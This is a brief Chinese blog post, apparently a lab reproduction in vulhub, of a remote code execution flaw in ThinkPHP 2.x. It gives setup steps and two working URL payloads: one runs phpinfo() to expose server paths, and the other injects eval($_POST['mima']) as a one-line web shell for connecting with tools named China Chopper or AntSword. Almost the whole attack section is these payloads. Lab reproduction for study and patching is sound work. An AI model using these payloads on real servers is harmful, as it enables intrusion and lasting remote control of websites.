thinkphp 2.x rce 漏洞复现

环境搭建

kali中下载vulhub

安装docker 与docker-compose

 

漏洞影响范围

thinkphp2.x

 

漏洞复现

 

payload1

/index.php?s=/index/index/xxx/${@phpinfo()}    //出现phpinfo明杆路径

 

payload2

  

/index.php?s=a/b/c/${@print(eval($_POST['mima']))}   //使用菜刀或蚁剑连接 

 

posted @ 2021-03-14 20:22  ze_z  阅读(305)  评论(0编辑  收藏  举报